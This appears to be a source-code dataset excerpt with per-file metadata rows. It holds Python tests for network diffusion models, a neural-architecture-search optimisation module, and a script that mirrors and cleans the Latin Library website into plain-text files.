self.assertEqual(nodes, [33, 32, 31, 30, 29, 28])
def test_compartment_add_node_pa(self):
g = nx.karate_club_graph()
attr = {n: {"even": int(n % 2)} for n in g.nodes()}
nx.set_node_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.AddNode(probability=1, initial_status="Susceptible", copy_attributes=True,
number_of_edges=4, model='PA')
c1 = cmp.NodeStochastic(1)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [35, 36, 37, 38, 39, 40])
def test_compartment_remove_node_top(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1, model="top")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [33, 32, 31, 30, 29, 28])
def test_compartment_remove_node_bottom(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1, model="bottom")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [33, 32, 31, 30, 29, 28]) | 32.012987 | 112 | 0.645233 | 616 | 4,930 | 4.951299 | 0.175325 | 0.062951 | 0.055082 | 0.025574 | 0.839672 | 0.816066 | 0.816066 | 0.804918 | 0.804918 | 0.804918 | 0 | 0.031696 | 0.232049 | 4,930 | 154 | 113 | 32.012987 | 0.773904 | 0 | 0 | 0.747664 | 0 | 0 | 0.10505 | 0.00507 | 0 | 0 | 0 | 0 | 0.056075 | 1 | 0.056075 | false | 0 | 0.065421 | 0 | 0.130841 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4f7ca4b49a6359ba9a20de24ee8c17d9ff51f82 | 27,803 | py | Python | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | 4 | 2020-09-30T04:38:45.000Z | 2022-03-18T10:57:54.000Z | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | null | null | null | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | 1 | 2021-01-27T09:27:21.000Z | 2021-01-27T09:27:21.000Z | import numpy as np
from .acquisition_functions import acq_fn
from ..models.meta_neural_net import MetaNeuralnet
import tensorflow as tf
from keras import backend as K
import copy
from nas_lib.utils.corr import get_kendalltau_coorlection
def bananas_case1(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
while query <= total_queries:
xtrain = np.array([d[1] for d in data])
ytrain = np.array([d[2] for d in data])
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[1] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(candidates[i][0],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[2] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data
def bananas_case2(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
xtrain = np.array([d[3] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic,
return_dist=True)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[3] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(matrix=candidates[i][1],
ops=candidates[i][2],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_nasbench_201(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_diff_training_nums_case1(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
training_nums=150):
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
train_data = []
while query <= total_queries:
if len(train_data) < training_nums:
train_data = copy.deepcopy(data)
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[1] for c in candidates])
predictions = []
train_error = 0
xtrain = np.array([d[1] for d in train_data])
ytrain = np.array([d[2] for d in train_data])
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(candidates[i][0],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[2] for d in data])[:min(5, len(data))]
logger.info('Query {}, training data nums {}, top 5 val losses {}'.format(query, len(train_data),
top_5_loss))
query += k
return data
def bananas_training_num_diff_case2(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
training_nums=150):
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
train_data = []
while query <= total_queries:
if len(train_data) < training_nums:
train_data = copy.deepcopy(data)
xtrain = np.array([d[3] for d in train_data])
ytrain = np.array([d[4] for d in train_data])
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[3] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(matrix=candidates[i][1],
ops=candidates[i][2],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, training data nums {}, top 5 val losses {}'.format(query, len(train_data),
top_5_loss))
query += k
return data
def bananas_nasbench_nlp(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
mutation_rate=0.3,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_nasbench_asr(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
mutation_rate=-1,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list} | 46.338333 | 111 | 0.486998 | 2,686 | 27,803 | 4.760983 | 0.055845 | 0.036988 | 0.011261 | 0.01564 | 0.979903 | 0.978808 | 0.978808 | 0.978808 | 0.9731 | 0.96356 | 0 | 0.012479 | 0.437974 | 27,803 | 600 | 112 | 46.338333 | 0.8059 | 0.008956 | 0 | 0.943363 | 0 | 0 | 0.031588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012389 | false | 0 | 0.012389 | 0 | 0.037168 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4fc88e4f3d0b16e831172a04ade5899447707d1 | 10,475 | py | Python | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 4 | 2015-10-16T11:58:58.000Z | 2019-04-06T19:53:02.000Z | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 5 | 2016-05-17T17:01:25.000Z | 2018-07-19T15:14:40.000Z | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 10 | 2016-05-17T15:31:53.000Z | 2019-03-30T22:15:02.000Z | import os
from nltk.util import clean_html
print "Downloading files ..."
#these files w/o last-modified header info
#so add -c to not dl if remote same size
os.system("wget -r -c -l0 -t1 -N -np -A.html,shtml -erobots=off http://www.thelatinlibrary.com/indices.html")
print "Removing indices and other non-Latin files ..."
os.system("rm -r www.thelatinlibrary.com/101/ www.thelatinlibrary.com/imperialism/ www.thelatinlibrary.com/ll2/ www.thelatinlibrary.com/law/ www.thelatinlibrary.com/romhist/ www.thelatinlibrary.com/satire/ www.thelatinlibrary.com/sallust/ www.thelatinlibrary.com/historians/ www.thelatinlibrary.com/certamen/ www.thelatinlibrary.com/caligula/ www.thelatinlibrary.com/caes/ www.thelatinlibrary.com/apul/ www.thelatinlibrary.com/august.html www.thelatinlibrary.com/ammianus.html www.thelatinlibrary.com/alanus.html www.thelatinlibrary.com/apicius.html www.thelatinlibrary.com/albertanus.html www.thelatinlibrary.com/albertofaix.html www.thelatinlibrary.com/alcuin.html www.thelatinlibrary.com/avienus.html www.thelatinlibrary.com/appverg.html www.thelatinlibrary.com/arnobius.html www.thelatinlibrary.com/apuleius.html www.thelatinlibrary.com/aquinas.html www.thelatinlibrary.com/alice.html www.thelatinlibrary.com/ausonius.html www.thelatinlibrary.com/abelard.html www.thelatinlibrary.com/about.html www.thelatinlibrary.com/anselm.html www.thelatinlibrary.com/addison.html www.thelatinlibrary.com/aug.html www.thelatinlibrary.com/ambrose.html www.thelatinlibrary.com/egeria.html www.thelatinlibrary.com/hyginus.html www.thelatinlibrary.com/iordanes.html www.thelatinlibrary.com/epubs.html www.thelatinlibrary.com/erasmus.html www.thelatinlibrary.com/decl.html www.thelatinlibrary.com/des.html www.thelatinlibrary.com/eutropius.html www.thelatinlibrary.com/florus.html www.thelatinlibrary.com/forsett.html www.thelatinlibrary.com/frame1.html www.thelatinlibrary.com/frame2.html www.thelatinlibrary.com/frontinus.html www.thelatinlibrary.com/commodianus.html www.thelatinlibrary.com/curtius.html www.thelatinlibrary.com/dante.html www.thelatinlibrary.com/contemp.html www.thelatinlibrary.com/cred.html www.thelatinlibrary.com/fulgentius.html www.thelatinlibrary.com/gaius.html www.thelatinlibrary.com/gellius.html www.thelatinlibrary.com/gestafrancorum.html www.thelatinlibrary.com/celtis.html www.thelatinlibrary.com/corvinus.html www.thelatinlibrary.com/godfrey.html www.thelatinlibrary.com/bultelius.html www.thelatinlibrary.com/claudian.html www.thelatinlibrary.com/cassiodorus.html www.thelatinlibrary.com/bible.html www.thelatinlibrary.com/caes.html www.thelatinlibrary.com/columba.html www.thelatinlibrary.com/campion.html www.thelatinlibrary.com/capellanus.html www.thelatinlibrary.com/columella.html www.thelatinlibrary.com/cato.html www.thelatinlibrary.com/certamen.html www.thelatinlibrary.com/christian.html www.thelatinlibrary.com/cic.html www.thelatinlibrary.com/classics.html www.thelatinlibrary.com/boethiusdacia.html www.thelatinlibrary.com/bede.html www.thelatinlibrary.com/bennett.html www.thelatinlibrary.com/bernardcluny.html www.thelatinlibrary.com/balde.html www.thelatinlibrary.com/bacon.html www.thelatinlibrary.com/manilius.html www.thelatinlibrary.com/miscmed.html www.thelatinlibrary.com/nemesianus.html www.thelatinlibrary.com/martial.html www.thelatinlibrary.com/malaterra.html www.thelatinlibrary.com/neo.html www.thelatinlibrary.com/nepos.html www.thelatinlibrary.com/marcellinus.html www.thelatinlibrary.com/liberpontificalis.html www.thelatinlibrary.com/may.html www.thelatinlibrary.com/medieval.html www.thelatinlibrary.com/melancthon.html www.thelatinlibrary.com/mirandola.html www.thelatinlibrary.com/misc.html www.thelatinlibrary.com/modinst.html www.thelatinlibrary.com/newton.html www.thelatinlibrary.com/leo.html www.thelatinlibrary.com/nithardus.html www.thelatinlibrary.com/lhomond.html www.thelatinlibrary.com/notitia.html www.thelatinlibrary.com/luther.html www.thelatinlibrary.com/phaedrus.html www.thelatinlibrary.com/lactantius.html www.thelatinlibrary.com/martinofbraga.html www.thelatinlibrary.com/leges.html www.thelatinlibrary.com/mapps.html www.thelatinlibrary.com/lucan.html www.thelatinlibrary.com/lucretius.html www.thelatinlibrary.com/orosius.html www.thelatinlibrary.com/ovid.html www.thelatinlibrary.com/ottofreising.html www.thelatinlibrary.com/papal.html www.thelatinlibrary.com/pascoli.html www.thelatinlibrary.com/patricius.html www.thelatinlibrary.com/pauldeacon.html www.thelatinlibrary.com/landor.html www.thelatinlibrary.com/leothegreat.html www.thelatinlibrary.com/liv.html www.thelatinlibrary.com/justin.html www.thelatinlibrary.com/justinian.html www.thelatinlibrary.com/juvenal.html www.thelatinlibrary.com/jerome.html www.thelatinlibrary.com/janus.html www.thelatinlibrary.com/sedulius.html www.thelatinlibrary.com/sall.html www.thelatinlibrary.com/ter.html www.thelatinlibrary.com/solinus.html www.thelatinlibrary.com/ritchie.html www.thelatinlibrary.com/sabinus.html www.thelatinlibrary.com/sidonius.html www.thelatinlibrary.com/sannazaro.html www.thelatinlibrary.com/sigebert.html www.thelatinlibrary.com/williamtyre.html www.thelatinlibrary.com/sen.html www.thelatinlibrary.com/tertullian.html www.thelatinlibrary.com/seneca.html www.thelatinlibrary.com/sha.html www.thelatinlibrary.com/vallauri.html www.thelatinlibrary.com/silius.html www.thelatinlibrary.com/waltarius.html www.thelatinlibrary.com/spinoza.html www.thelatinlibrary.com/statius.html www.thelatinlibrary.com/suet.html www.thelatinlibrary.com/sulpiciusseverus.html www.thelatinlibrary.com/tac.html www.thelatinlibrary.com/theodosius.html www.thelatinlibrary.com/tib.html www.thelatinlibrary.com/valeriusflaccus.html www.thelatinlibrary.com/vitruvius.html www.thelatinlibrary.com/readme2005.html www.thelatinlibrary.com/readme2007.html www.thelatinlibrary.com/richerus.html www.thelatinlibrary.com/readme2006.html www.thelatinlibrary.com/readme1999.html www.thelatinlibrary.com/readme.html www.thelatinlibrary.com/readme2000.html www.thelatinlibrary.com/readme1998.html www.thelatinlibrary.com/readme2001.html www.thelatinlibrary.com/readme2002.html www.thelatinlibrary.com/readme2003.html www.thelatinlibrary.com/readme2004.html www.thelatinlibrary.com/quintilian.html www.thelatinlibrary.com/livius/ www.thelatinlibrary.com/livy/liv.per.shtml www.thelatinlibrary.com/plautus.html www.thelatinlibrary.com/pliny.html www.thelatinlibrary.com/pliny1.html www.thelatinlibrary.com/augustine/serm.shtml www.thelatinlibrary.com/cicero/adbrutum.shtml www.thelatinlibrary.com/cicero/cat.shtml www.thelatinlibrary.com/cicero/fam.shtml www.thelatinlibrary.com/cicero/fin.shtml www.thelatinlibrary.com/cicero/inventione.shtml www.thelatinlibrary.com/cicero/fratrem.shtml www.thelatinlibrary.com/cicero/leg.shtml www.thelatinlibrary.com/cicero/legagr.shtml www.thelatinlibrary.com/cicero/oratore.shtml www.thelatinlibrary.com/cicero/phil.shtml www.thelatinlibrary.com/cicero/off.shtml www.thelatinlibrary.com/cicero/repub.shtml www.thelatinlibrary.com/cicero/tusc.shtml www.thelatinlibrary.com/cicero/ver.shtml www.thelatinlibrary.com/cicero/nd.shtml www.thelatinlibrary.com/cicero/epis.shtml www.thelatinlibrary.com/virgil/index.html www.thelatinlibrary.com/varro.html www.thelatinlibrary.com/valmax.html www.thelatinlibrary.com/prop.html www.thelatinlibrary.com/Voc.html www.thelatinlibrary.com/Vocab.html www.thelatinlibrary.com/Vocab2.html www.thelatinlibrary.com/tertullian/tertullian.cultu.shtml www.thelatinlibrary.com/tertullian/tertullian.marcionem.shtml www.thelatinlibrary.com/tertullian/tertullian.nationes.shtml www.thelatinlibrary.com/tertullian/tertullian.uxor.shtml www.thelatinlibrary.com/prud.html www.thelatinlibrary.com/pomponius.html www.thelatinlibrary.com/sedulius.html www.thelatinlibrary.com/vegetius.html www.thelatinlibrary.com/vell.html www.thelatinlibrary.com/verg.html www.thelatinlibrary.com/addison.html www.thelatinlibrary.com/albertanus.html")
print "Stripping HTML and changing extensions to .txt ..."
for r,d,f in os.walk("www.thelatinlibrary.com"):
for files in f:
if files.endswith("html"):
path = os.path.join(r,files)
opened = open(path, 'r')
readed = opened.read()
opened.close()
new_opened = open(path, "w")
new_opened.write(clean_html(readed))
new_opened.close()
fileName, fileExtension = os.path.splitext(path)
os.rename(fileName + fileExtension, fileName + ".txt")
print "Creating Public Domain LICENSE ..."
os.system("touch www.thelatinlibrary.com/LICENSE.md")
os.system("printf 'Public Domain Mark 1.0\n----------------------\n### No Copyright\nThis work has been identified as being free of known restrictions under copyright law, including all related and neighboring rights.\n\nYou can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information below.\n\n### Other Information\n- The work may not be free of known copyright restrictions in all jurisdictions.\n- Persons may have other rights in or related to the work, such as patent or trademark rights, and others may have rights in how the work is used, such as publicity or privacy rights.\n- In some jurisdictions moral rights of the author may persist beyond the term of copyright. These rights may include the right to be identified as the author and the right to object to derogatory treatments.\n- Unless expressly stated otherwise, the person who identified the work makes no warranties about the work, and disclaims liability for all uses of the work, to the 